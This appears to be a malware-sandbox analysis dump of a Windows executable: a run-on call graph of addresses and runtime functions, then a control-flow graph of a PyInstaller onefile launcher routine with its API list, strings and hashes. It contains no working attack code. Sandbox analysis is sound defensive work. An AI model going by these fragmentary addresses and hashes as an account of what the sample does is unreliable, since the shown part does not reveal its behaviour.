7ff6c81f1618 18363 7ff6c81f162e 18361->18363 18367 7ff6c81f2710 54 API calls 18361->18367 18364 7ff6c81f1682 18362->18364 18365 7ff6c81f1653 18362->18365 18363->17255 18366 7ff6c81f45c0 108 API calls 18364->18366 18368 7ff6c8204f08 _get_daylight 11 API calls 18365->18368 18370 7ff6c81f1696 18366->18370 18367->18363 18369 7ff6c81f1658 18368->18369 18371 7ff6c81f2910 54 API calls 18369->18371 18372 7ff6c81f169e 18370->18372 18373 7ff6c81f16b8 18370->18373 18374 7ff6c81f1671 18371->18374 18375 7ff6c81f2710 54 API calls 18372->18375 18376 7ff6c82006d4 73 API calls 18373->18376 18374->17255 18377 7ff6c81f16ae 18375->18377 18378 7ff6c81f16cd 18376->18378 18382 7ff6c820004c 74 API calls 18377->18382 18379 7ff6c81f16d1 18378->18379 18380 7ff6c81f16f9 18378->18380 18383 7ff6c8204f08 _get_daylight 11 API calls 18379->18383 18381 7ff6c81f16ff 18380->18381 18387 7ff6c81f1717 18380->18387 18455 7ff6c81f1210 18381->18455 18385 7ff6c81f1829 18382->18385 18386 7ff6c81f16d6 18383->18386 18385->17255 18388 7ff6c81f2910 54 API calls 18386->18388 18389 7ff6c81f1739 18387->18389 18399 7ff6c81f1761 18387->18399 18395 7ff6c81f16ef __std_exception_copy 18388->18395 18391 7ff6c8204f08 _get_daylight 11 API calls 18389->18391 18390 7ff6c820004c 74 API calls 18390->18377 18392 7ff6c81f173e 18391->18392 18394 7ff6c81f2910 54 API calls 18392->18394 18393 7ff6c820039c _fread_nolock 53 API calls 18393->18399 18394->18395 18395->18390 18396 7ff6c81f17da 18398 7ff6c8204f08 _get_daylight 11 API calls 18396->18398 18400 7ff6c81f17ca 18398->18400 18399->18393 18399->18395 18399->18396 18401 7ff6c81f17c5 18399->18401 18508 7ff6c8200adc 18399->18508 18402 7ff6c8204f08 _get_daylight 11 API calls 18401->18402 18402->18400 18405 7ff6c81f7144 18404->18405 18406 7ff6c81f718b 18404->18406 18405->18406 18541 7ff6c8205024 18405->18541 18406->17255 18409 7ff6c81f41a1 18408->18409 18410 7ff6c81f44e0 49 API calls 18409->18410 18411 7ff6c81f41db 18410->18411 18412 7ff6c81f44e0 49 API calls 18411->18412 18413 7ff6c81f41eb 18412->18413 18414 7ff6c81f423c 18413->18414 18415 7ff6c81f420d 18413->18415 18417 7ff6c81f4110 51 API calls 18414->18417 18556 7ff6c81f4110 18415->18556 18418 7ff6c81f423a 18417->18418 18419 7ff6c81f429c 18418->18419 18420 7ff6c81f4267 18418->18420 18422 7ff6c81f4110 51 API calls 18419->18422 18563 7ff6c81f7cf0 18420->18563 18424 7ff6c81f42c0 18422->18424 18426 7ff6c81f4110 51 API calls 18424->18426 18437 7ff6c81f4312 18424->18437 18425 7ff6c81f4297 18431 7ff6c81f42e9 18426->18431 18427 7ff6c81f4393 18429 7ff6c81f1950 115 API calls 18427->18429 18432 7ff6c81f439d 18429->18432 18434 7ff6c81f4110 51 API calls 18431->18434 18431->18437 18435 7ff6c81f43a5 18432->18435 18436 7ff6c81f43fe 18432->18436 18434->18437 18589 7ff6c81f1840 18435->18589 18437->18427 18439 7ff6c81f438c 18437->18439 18440 7ff6c81f4317 18437->18440 18443 7ff6c81f437b 18437->18443 18439->18435 18439->18440 18445 7ff6c81f2710 54 API calls 18440->18445 18444 7ff6c81f2710 54 API calls 18443->18444 18444->18440 18445->18425 18453 7ff6c81f1c80 49 API calls 18452->18453 18454 7ff6c81f4474 18453->18454 18454->17255 18456 7ff6c81f1268 18455->18456 18457 7ff6c81f126f 18456->18457 18458 7ff6c81f1297 18456->18458 18459 7ff6c81f2710 54 API calls 18457->18459 18461 7ff6c81f12d4 18458->18461 18462 7ff6c81f12b1 18458->18462 18478 7ff6c81f45c0 108 API calls 18477->18478 18479 7ff6c81f108c 18478->18479 18480 7ff6c81f1094 18479->18480 18481 7ff6c81f10a9 18479->18481 18482 7ff6c81f2710 54 API calls 18480->18482 18483 7ff6c82006d4 73 API calls 18481->18483 18489 7ff6c81f10a4 __std_exception_copy 18482->18489 18484 7ff6c81f10bf 18483->18484 18485 7ff6c81f10c3 18484->18485 18486 7ff6c81f10e6 18484->18486 18487 7ff6c8204f08 _get_daylight 11 API calls 18485->18487 18491 7ff6c81f1122 18486->18491 18492 7ff6c81f10f7 18486->18492 18488 7ff6c81f10c8 18487->18488 18490 7ff6c81f2910 54 API calls 18488->18490 18489->18361 18499 7ff6c81f10e1 __std_exception_copy 18490->18499 18493 7ff6c81f1129 18491->18493 18502 7ff6c81f113c 18491->18502 18494 7ff6c8204f08 _get_daylight 11 API calls 18492->18494 18495 7ff6c81f1210 92 API calls 18493->18495 18496 7ff6c81f1100 18494->18496 18495->18499 18497 7ff6c81f2910 54 API calls 18496->18497 18497->18499 18498 7ff6c820004c 74 API calls 18500 7ff6c81f11b4 18498->18500 18499->18498 18500->18489 18512 7ff6c81f46f0 18500->18512 18501 7ff6c820039c _fread_nolock 53 API calls 18501->18502 18502->18499 18502->18501 18504 7ff6c81f11ed 18502->18504 18505 7ff6c8204f08 _get_daylight 11 API calls 18504->18505 18506 7ff6c81f11f2 18505->18506 18507 7ff6c81f2910 54 API calls 18506->18507 18507->18499 18509 7ff6c8200b0c 18508->18509 18526 7ff6c820082c 18509->18526 18513 7ff6c81f4700 18512->18513 18514 7ff6c81f9390 2 API calls 18513->18514 18542 7ff6c8205031 18541->18542 18543 7ff6c820505e 18541->18543 18544 7ff6c8204f08 _get_daylight 11 API calls 18542->18544 18553 7ff6c8204fe8 18542->18553 18545 7ff6c8205081 18543->18545 18546 7ff6c820509d 18543->18546 18547 7ff6c820503b 18544->18547 18548 7ff6c8204f08 _get_daylight 11 API calls 18545->18548 18549 7ff6c8204f4c 45 API calls 18546->18549 18550 7ff6c820a8e0 _invalid_parameter_noinfo 37 API calls 18547->18550 18551 7ff6c8205086 18548->18551 18555 7ff6c8205091 18549->18555 18552 7ff6c8205046 18550->18552 18554 7ff6c820a8e0 _invalid_parameter_noinfo 37 API calls 18551->18554 18552->18405 18553->18405 18554->18555 18555->18405 18557 7ff6c81f4136 18556->18557 18558 7ff6c8204984 49 API calls 18557->18558 18559 7ff6c81f415c 18558->18559 18560 7ff6c81f416d 18559->18560 18561 7ff6c81f4560 10 API calls 18559->18561 18560->18418 18562 7ff6c81f417f 18561->18562 18562->18418 18564 7ff6c81f7d05 18563->18564 18565 7ff6c81f45c0 108 API calls 18564->18565 18566 7ff6c81f7d2b 18565->18566 18567 7ff6c81f45c0 108 API calls 18566->18567 18581 7ff6c81f7d52 18566->18581 18569 7ff6c81f7d42 18567->18569 18568 7ff6c81fc550 _log10_special 8 API calls 18570 7ff6c81f4277 18568->18570 18571 7ff6c81f7d5c 18569->18571 18572 7ff6c81f7d4d 18569->18572 18570->18425 18581->18568 18620 7ff6c8205ec8 18619->18620 18621 7ff6c8205eee 18620->18621 18624 7ff6c8205f21 18620->18624 18622 7ff6c8204f08 _get_daylight 11 API calls 18621->18622 18623 7ff6c8205ef3 18622->18623 18627 7ff6c820a8e0 _invalid_parameter_noinfo 37 API calls 18623->18627 18625 7ff6c8205f34 18624->18625 18626 7ff6c8205f27 18624->18626 18638 7ff6c820ac28 18625->18638 18628 7ff6c8204f08 _get_daylight 11 API calls 18626->18628 18630 7ff6c81f4616 18627->18630 18628->18630 18630->17287 18651 7ff6c82102d8 EnterCriticalSection 18638->18651 19011 7ff6c82078f8 19010->19011 19014 7ff6c82073d4 19011->19014 19013 7ff6c8207911 19013->17297 19015 7ff6c82073ef 19014->19015 19016 7ff6c820741e 19014->19016 19017 7ff6c820a814 _invalid_parameter_noinfo 37 API calls 19015->19017 19024 7ff6c820546c EnterCriticalSection 19016->19024 19019 7ff6c820740f 19017->19019 19019->19013 19026 7ff6c81ffe43 19025->19026 19028 7ff6c81ffe71 19025->19028 19027 7ff6c820a814 _invalid_parameter_noinfo 37 API calls 19026->19027 19029 7ff6c81ffe63 19027->19029 19028->19029 19035 7ff6c820546c EnterCriticalSection 19028->19035 19029->17301 19037 7ff6c81f45c0 108 API calls 19036->19037 19038 7ff6c81f1493 19037->19038 19039 7ff6c81f14bc 19038->19039 19040 7ff6c81f149b 19038->19040 19041 7ff6c82006d4 73 API calls 19039->19041 19042 7ff6c81f2710 54 API calls 19040->19042 19043 7ff6c81f14d1 19041->19043 19044 7ff6c81f14ab 19042->19044 19045 7ff6c81f14d5 19043->19045 19046 7ff6c81f14f8 19043->19046 19044->17327 19047 7ff6c8204f08 _get_daylight 11 API calls 19045->19047 19050 7ff6c81f1532 19046->19050 19051 7ff6c81f1508 19046->19051 19048 7ff6c81f14da 19047->19048 19049 7ff6c81f2910 54 API calls 19048->19049 19057 7ff6c81f14f3 __std_exception_copy 19049->19057 19052 7ff6c81f1538 19050->19052 19061 7ff6c81f154b 19050->19061 19053 7ff6c8204f08 _get_daylight 11 API calls 19051->19053 19054 7ff6c81f1210 92 API calls 19052->19054 19055 7ff6c81f1510 19053->19055 19054->19057 19058 7ff6c81f2910 54 API calls 19055->19058 19056 7ff6c820004c 74 API calls 19059 7ff6c81f15c4 19056->19059 19057->19056 19058->19057 19059->17327 19060 7ff6c820039c _fread_nolock 53 API calls 19060->19061 19061->19057 19061->19060 19062 7ff6c81f15d6 19061->19062 19063 7ff6c8204f08 _get_daylight 11 API calls 19062->19063 19064 7ff6c81f15db 19063->19064 19143 7ff6c81f6375 19142->19143 19144 7ff6c81f1c80 49 API calls 19143->19144 19145 7ff6c81f63b1 19144->19145 19146 7ff6c81f63dd 19145->19146 19147 7ff6c81f63ba 19145->19147 19149 7ff6c81f4630 49 API calls 19146->19149 19148 7ff6c81f2710 54 API calls 19147->19148 19165 7ff6c81f63d3 19148->19165 19150 7ff6c81f63f5 19149->19150 19151 7ff6c81f6413 19150->19151 19152 7ff6c81f2710 54 API calls 19150->19152 19153 7ff6c81f4560 10 API calls 19151->19153 19152->19151 19156 7ff6c81f641d 19153->19156 19154 7ff6c81fc550 _log10_special 8 API calls 19155 7ff6c81f336e 19154->19155 19155->17401 19173 7ff6c81f6500 19155->19173 19157 7ff6c81f642b 19156->19157 19158 7ff6c81f8e80 3 API calls 19156->19158 19159 7ff6c81f4630 49 API calls 19157->19159 19158->19157 19160 7ff6c81f6444 19159->19160 19161 7ff6c81f6469 19160->19161 19162 7ff6c81f6449 19160->19162 19164 7ff6c81f8e80 3 API calls 19161->19164 19163 7ff6c81f2710 54 API calls 19162->19163 19163->19165 19166 7ff6c81f6476 19164->19166 19165->19154 19322 7ff6c81f5400 19173->19322 19175 7ff6c81f6526 19176 7ff6c81f652e 19175->19176 19177 7ff6c81f653f 19175->19177 19178 7ff6c81f2710 54 API calls 19176->19178 19329 7ff6c81f4c90 19177->19329 19324 7ff6c81f542c 19322->19324 19323 7ff6c81f5434 19323->19175 19324->19323 19327 7ff6c81f55d4 19324->19327 19353 7ff6c8206aa4 19324->19353 19325 7ff6c81f5797 __std_exception_copy 19325->19175 19326 7ff6c81f47d0 47 API calls 19326->19327 19327->19325 19327->19326 19330 7ff6c81f4cc0 19329->19330 19354 7ff6c8206ad4 19353->19354 19357 7ff6c8205fa0 19354->19357 19358 7ff6c8205fe3 19357->19358 19359 7ff6c8205fd1 19357->19359 19415->17404 19417 7ff6c820b150 __CxxCallCatchBlock 45 API calls 19416->19417 19418 7ff6c820a3e1 19417->19418 19419 7ff6c820a504 __CxxCallCatchBlock 45 API calls 19418->19419 19420 7ff6c820a401 19419->19420 19647 7ff6c8209d50 19650 7ff6c8209ccc 19647->19650 19657 7ff6c82102d8 EnterCriticalSection 19650->19657 19899 7ff6c820afd0 19900 7ff6c820afea 19899->19900 19901 7ff6c820afd5 19899->19901 19905 7ff6c820aff0 19901->19905 19906 7ff6c820b03a 19905->19906 19907 7ff6c820b032 19905->19907 19909 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19906->19909 19908 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19907->19908 19908->19906 19910 7ff6c820b047 19909->19910 19911 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19910->19911 19912 7ff6c820b054 19911->19912 19913 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19912->19913 19914 7ff6c820b061 19913->19914 19915 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19914->19915 19916 7ff6c820b06e 19915->19916 19917 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19916->19917 19918 7ff6c820b07b 19917->19918 19919 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19918->19919 19920 7ff6c820b088 19919->19920 19921 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19920->19921 19922 7ff6c820b095 19921->19922 19923 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19922->19923 19924 7ff6c820b0a5 19923->19924 19925 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19924->19925 19926 7ff6c820b0b5 19925->19926 19931 7ff6c820ae94 19926->19931 19945 7ff6c82102d8 EnterCriticalSection 19931->19945 19661 7ff6c81fcb50 19662 7ff6c81fcb60 19661->19662 19678 7ff6c8209ba8 19662->19678 19664 7ff6c81fcb6c 19684 7ff6c81fce48 19664->19684 19666 7ff6c81fd12c 7 API calls 19668 7ff6c81fcc05 19666->19668 19667 7ff6c81fcb84 _RTC_Initialize 19676 7ff6c81fcbd9 19667->19676 19689 7ff6c81fcff8 19667->19689 19670 7ff6c81fcb99 19692 7ff6c8209014 19670->19692 19676->19666 19677 7ff6c81fcbf5 19676->19677 19679 7ff6c8209bb9 19678->19679 19680 7ff6c8209bc1 19679->19680 19681 7ff6c8204f08 _get_daylight 11 API calls 19679->19681 19680->19664 19682 7ff6c8209bd0 19681->19682 19683 7ff6c820a8e0 _invalid_parameter_noinfo 37 API calls 19682->19683 19683->19680 19685 7ff6c81fce59 19684->19685 19688 7ff6c81fce5e __scrt_release_startup_lock 19684->19688 19686 7ff6c81fd12c 7 API calls 19685->19686 19685->19688 19687 7ff6c81fced2 19686->19687 19688->19667 19717 7ff6c81fcfbc 19689->19717 19691 7ff6c81fd001 19691->19670 19693 7ff6c81fcba5 19692->19693 19694 7ff6c8209034 19692->19694 19693->19676 19716 7ff6c81fd0cc InitializeSListHead 19693->19716 19695 7ff6c820903c 19694->19695 19696 7ff6c8209052 GetModuleFileNameW 19694->19696 19697 7ff6c8204f08 _get_daylight 11 API calls 19695->19697 19700 7ff6c820907d 19696->19700 19698 7ff6c8209041 19697->19698 19699 7ff6c820a8e0 _invalid_parameter_noinfo 37 API calls 19698->19699 19699->19693 19732 7ff6c8208fb4 19700->19732 19703 7ff6c82090c5 19704 7ff6c8204f08 _get_daylight 11 API calls 19703->19704 19705 7ff6c82090ca 19704->19705 19706 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19705->19706 19706->19693 19707 7ff6c82090ff 19709 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19707->19709 19708 7ff6c82090dd 19708->19707 19710 7ff6c820912b 19708->19710 19711 7ff6c8209144 19708->19711 19709->19693 19712 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19710->19712 19714 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19711->19714 19713 7ff6c8209134 19712->19713 19715 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19713->19715 19714->19707 19715->19693 19718 7ff6c81fcfd6 19717->19718 19720 7ff6c81fcfcf 19717->19720 19721 7ff6c820a1ec 19718->19721 19720->19691 19724 7ff6c8209e28 19721->19724 19731 7ff6c82102d8 EnterCriticalSection 19724->19731 19733 7ff6c8208fcc 19732->19733 19737 7ff6c8209004 19732->19737 19734 7ff6c820eb98 _get_daylight 11 API calls 19733->19734 19733->19737 19735 7ff6c8208ffa 19734->19735 19736 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19735->19736 19736->19737 19737->19703 19737->19708 20126 7ff6c82116b0 20137 7ff6c82173e4 20126->20137 20138 7ff6c82173f1 20137->20138 20139 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20138->20139 20140 7ff6c821740d 20138->20140 20139->20138 20141 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20140->20141 20142 7ff6c82116b9 20140->20142 20141->20140 20143 7ff6c82102d8 EnterCriticalSection 20142->20143 20650 7ff6c820c520 20661 7ff6c82102d8 EnterCriticalSection 20650->20661 19464 7ff6c8205628 19465 7ff6c8205642 19464->19465 19466 7ff6c820565f 19464->19466 19467 7ff6c8204ee8 _fread_nolock 11 API calls 19465->19467 19466->19465 19468 7ff6c8205672 CreateFileW 19466->19468 19469 7ff6c8205647 19467->19469 19470 7ff6c82056dc 19468->19470 19471 7ff6c82056a6 19468->19471 19472 7ff6c8204f08 _get_daylight 11 API calls 19469->19472 19515 7ff6c8205c04 19470->19515 19489 7ff6c820577c GetFileType 19471->19489 19475 7ff6c820564f 19472->19475 19480 7ff6c820a8e0 _invalid_parameter_noinfo 37 API calls 19475->19480 19478 7ff6c82056e5 19483 7ff6c8204e7c _fread_nolock 11 API calls 19478->19483 19479 7ff6c8205710 19536 7ff6c82059c4 19479->19536 19485 7ff6c820565a 19480->19485 19481 7ff6c82056d1 CloseHandle 19481->19485 19482 7ff6c82056bb CloseHandle 19482->19485 19488 7ff6c82056ef 19483->19488 19488->19485 19490 7ff6c8205887 19489->19490 19491 7ff6c82057ca 19489->19491 19493 7ff6c82058b1 19490->19493 19494 7ff6c820588f 19490->19494 19492 7ff6c82057f6 GetFileInformationByHandle 19491->19492 19495 7ff6c8205b00 21 API calls 19491->19495 19496 7ff6c82058a2 GetLastError 19492->19496 19497 7ff6c820581f 19492->19497 19499 7ff6c82058d4 PeekNamedPipe 19493->19499 19514 7ff6c8205872 19493->19514 19494->19496 19498 7ff6c8205893 19494->19498 19500 7ff6c82057e4 19495->19500 19503 7ff6c8204e7c _fread_nolock 11 API calls 19496->19503 19501 7ff6c82059c4 51 API calls 19497->19501 19502 7ff6c8204f08 _get_daylight 11 API calls 19498->19502 19499->19514 19500->19492 19500->19514 19505 7ff6c820582a 19501->19505 19502->19514 19503->19514 19504 7ff6c81fc550 _log10_special 8 API calls 19506 7ff6c82056b4 19504->19506 19553 7ff6c8205924 19505->19553 19506->19481 19506->19482 19509 7ff6c8205924 10 API calls 19510 7ff6c8205849 19509->19510 19511 7ff6c8205924 10 API calls 19510->19511 19512 7ff6c820585a 19511->19512 19513 7ff6c8204f08 _get_daylight 11 API calls 19512->19513 19512->19514 19513->19514 19514->19504 19516 7ff6c8205c3a 19515->19516 19517 7ff6c8204f08 _get_daylight 11 API calls 19516->19517 19535 7ff6c8205cd2 __std_exception_copy 19516->19535 19519 7ff6c8205c4c 19517->19519 19518 7ff6c81fc550 _log10_special 8 API calls 19520 7ff6c82056e1 19518->19520 19521 7ff6c8204f08 _get_daylight 11 API calls 19519->19521 19520->19478 19520->19479 19522 7ff6c8205c54 19521->19522 19523 7ff6c8207e08 45 API calls 19522->19523 19524 7ff6c8205c69 19523->19524 19525 7ff6c8205c71 19524->19525 19526 7ff6c8205c7b 19524->19526 19527 7ff6c8204f08 _get_daylight 11 API calls 19525->19527 19528 7ff6c8204f08 _get_daylight 11 API calls 19526->19528 19531 7ff6c8205c76 19527->19531 19529 7ff6c8205c80 19528->19529 19530 7ff6c8204f08 _get_daylight 11 API calls 19529->19530 19529->19535 19532 7ff6c8205c8a 19530->19532 19534 7ff6c8205cc4 GetDriveTypeW 19531->19534 19531->19535 19533 7ff6c8207e08 45 API calls 19532->19533 19533->19531 19534->19535 19535->19518 19538 7ff6c82059ec 19536->19538 19537 7ff6c820571d 19546 7ff6c8205b00 19537->19546 19538->19537 19560 7ff6c820f724 19538->19560 19540 7ff6c8205a80 19540->19537 19541 7ff6c820f724 51 API calls 19540->19541 19542 7ff6c8205a93 19541->19542 19542->19537 19543 7ff6c820f724 51 API calls 19542->19543 19544 7ff6c8205aa6 19543->19544 19544->19537 19545 7ff6c820f724 51 API calls 19544->19545 19545->19537 19547 7ff6c8205b1a 19546->19547 19548 7ff6c8205b51 19547->19548 19549 7ff6c8205b2a 19547->19549 19550 7ff6c820f5b8 21 API calls 19548->19550 19551 7ff6c8204e7c _fread_nolock 11 API calls 19549->19551 19552 7ff6c8205b3a 19549->19552 19550->19552 19551->19552 19552->19488 19554 7ff6c8205940 19553->19554 19555 7ff6c820594d FileTimeToSystemTime 19553->19555 19554->19555 19557 7ff6c8205948 19554->19557 19556 7ff6c8205961 SystemTimeToTzSpecificLocalTime 19555->19556 19555->19557 19556->19557 19558 7ff6c81fc550 _log10_special 8 API calls 19557->19558 19559 7ff6c8205839 19558->19559 19559->19509 19561 7ff6c820f755 19560->19561 19562 7ff6c820f731 19560->19562 19564 7ff6c820f78f 19561->19564 19567 7ff6c820f7ae 19561->19567 19562->19561 19563 7ff6c820f736 19562->19563 19565 7ff6c8204f08 _get_daylight 11 API calls 19563->19565 19566 7ff6c8204f08 _get_daylight 11 API calls 19564->19566 19568 7ff6c820f73b 19565->19568 19569 7ff6c820f794 19566->19569 19570 7ff6c8204f4c 45 API calls 19567->19570 19571 7ff6c820a8e0 _invalid_parameter_noinfo 37 API calls 19568->19571 19572 7ff6c820a8e0 _invalid_parameter_noinfo 37 API calls 19569->19572 19576 7ff6c820f7bb 19570->19576 19573 7ff6c820f746 19571->19573 19575 7ff6c820f79f 19572->19575 19573->19540 19574 7ff6c82104dc 51 API calls 19574->19576 19575->19540 19576->19574 19576->19575 16831 7ff6c820f98c 16832 7ff6c820fb7e 16831->16832 16834 7ff6c820f9ce _isindst 16831->16834 16833 7ff6c8204f08 _get_daylight 11 API calls 16832->16833 16851 7ff6c820fb6e 16833->16851 16834->16832 16837 7ff6c820fa4e _isindst 16834->16837 16835 7ff6c81fc550 _log10_special 8 API calls 16836 7ff6c820fb99 16835->16836 16852 7ff6c8216194 16837->16852 16842 7ff6c820fbaa 16844 7ff6c820a900 _isindst 17 API calls 16842->16844 16846 7ff6c820fbbe 16844->16846 16849 7ff6c820faab 16849->16851 16876 7ff6c82161d8 16849->16876 16851->16835 16853 7ff6c82161a3 16852->16853 16857 7ff6c820fa6c 16852->16857 16883 7ff6c82102d8 EnterCriticalSection 16853->16883 16858 7ff6c8215598 16857->16858 16859 7ff6c820fa81 16858->16859 16860 7ff6c82155a1 16858->16860 16859->16842 16864 7ff6c82155c8 16859->16864 16861 7ff6c8204f08 _get_daylight 11 API calls 16860->16861 16862 7ff6c82155a6 16861->16862 16863 7ff6c820a8e0 _invalid_parameter_noinfo 37 API calls 16862->16863 16863->16859 16865 7ff6c820fa92 16864->16865 16866 7ff6c82155d1 16864->16866 16865->16842 16870 7ff6c82155f8 16865->16870 16867 7ff6c8204f08 _get_daylight 11 API calls 16866->16867 16868 7ff6c82155d6 16867->16868 16869 7ff6c820a8e0 _invalid_parameter_noinfo 37 API calls 16868->16869 16869->16865 16871 7ff6c820faa3 16870->16871 16872 7ff6c8215601 16870->16872 16871->16842 16871->16849 16873 7ff6c8204f08 _get_daylight 11 API calls 16872->16873 16874 7ff6c8215606 16873->16874 16875 7ff6c820a8e0 _invalid_parameter_noinfo 37 API calls 16874->16875 16875->16871 16884 7ff6c82102d8 EnterCriticalSection 16876->16884 19981 7ff6c8205410 19982 7ff6c820541b 19981->19982 19990 7ff6c820f2a4 19982->19990 20003 7ff6c82102d8 EnterCriticalSection 19990->20003 20004 7ff6c821adfe 20005 7ff6c821ae17 20004->20005 20006 7ff6c821ae0d 20004->20006 20008 7ff6c8210338 LeaveCriticalSection 20006->20008

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 0 7ff6c81f89e0-7ff6c81f8b26 call 7ff6c81fc850 call 7ff6c81f9390 SetConsoleCtrlHandler GetStartupInfoW call 7ff6c82053f0 call 7ff6c820a47c call 7ff6c820871c call 7ff6c82053f0 call 7ff6c820a47c call 7ff6c820871c call 7ff6c82053f0 call 7ff6c820a47c call 7ff6c820871c GetCommandLineW CreateProcessW 23 7ff6c81f8b4d-7ff6c81f8b89 RegisterClassW 0->23 24 7ff6c81f8b28-7ff6c81f8b48 GetLastError call 7ff6c81f2c50 0->24 26 7ff6c81f8b91-7ff6c81f8be5 CreateWindowExW 23->26 27 7ff6c81f8b8b GetLastError 23->27 31 7ff6c81f8e39-7ff6c81f8e5f call 7ff6c81fc550 24->31 29 7ff6c81f8bef-7ff6c81f8bf4 ShowWindow 26->29 30 7ff6c81f8be7-7ff6c81f8bed GetLastError 26->30 27->26 32 7ff6c81f8bfa-7ff6c81f8c0a WaitForSingleObject 29->32 30->32 34 7ff6c81f8c0c 32->34 35 7ff6c81f8c88-7ff6c81f8c8f 32->35 39 7ff6c81f8c10-7ff6c81f8c13 34->39 36 7ff6c81f8cd2-7ff6c81f8cd9 35->36 37 7ff6c81f8c91-7ff6c81f8ca1 WaitForSingleObject 35->37 42 7ff6c81f8dc0-7ff6c81f8dd9 GetMessageW 36->42 43 7ff6c81f8cdf-7ff6c81f8cf5 QueryPerformanceFrequency QueryPerformanceCounter 36->43 40 7ff6c81f8df8-7ff6c81f8e02 37->40 41 7ff6c81f8ca7-7ff6c81f8cb7 TerminateProcess 37->41 44 7ff6c81f8c15 GetLastError 39->44 45 7ff6c81f8c1b-7ff6c81f8c22 39->45 48 7ff6c81f8e04-7ff6c81f8e0a DestroyWindow 40->48 49 7ff6c81f8e11-7ff6c81f8e35 GetExitCodeProcess CloseHandle * 2 40->49 50 7ff6c81f8cbf-7ff6c81f8ccd WaitForSingleObject 41->50 51 7ff6c81f8cb9 GetLastError 41->51 46 7ff6c81f8def-7ff6c81f8df6 42->46 47 7ff6c81f8ddb-7ff6c81f8de9 TranslateMessage DispatchMessageW 42->47 52 7ff6c81f8d00-7ff6c81f8d38 MsgWaitForMultipleObjects PeekMessageW 43->52 44->45 45->37 53 7ff6c81f8c24-7ff6c81f8c41 PeekMessageW 45->53 46->40 46->42 47->46 48->49 49->31 50->40 51->50 56 7ff6c81f8d73-7ff6c81f8d7a 52->56 57 7ff6c81f8d3a 52->57 54 7ff6c81f8c43-7ff6c81f8c74 TranslateMessage DispatchMessageW PeekMessageW 53->54 55 7ff6c81f8c76-7ff6c81f8c86 WaitForSingleObject 53->55 54->54 54->55 55->35 55->39 56->42 59 7ff6c81f8d7c-7ff6c81f8da5 QueryPerformanceCounter 56->59 58 7ff6c81f8d40-7ff6c81f8d71 TranslateMessage DispatchMessageW PeekMessageW 57->58 58->56 58->58 59->52 60 7ff6c81f8dab-7ff6c81f8db2 59->60 60->40 61 7ff6c81f8db4-7ff6c81f8db8 60->61 61->42
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                      • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                      • API String ID: 3832162212-3165540532
                                                                                                      • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                      • Instruction ID: b1780183d7847a1ab7a8f2a61f27930b43e62af4ca9295789a55e9ad356bcb2f
                                                                                                      • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                      • Instruction Fuzzy Hash: E2D1A431A08B9396EB208F34E9582AD77B0FF94B59F500235DA9E83AA4DF3CD545C748

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
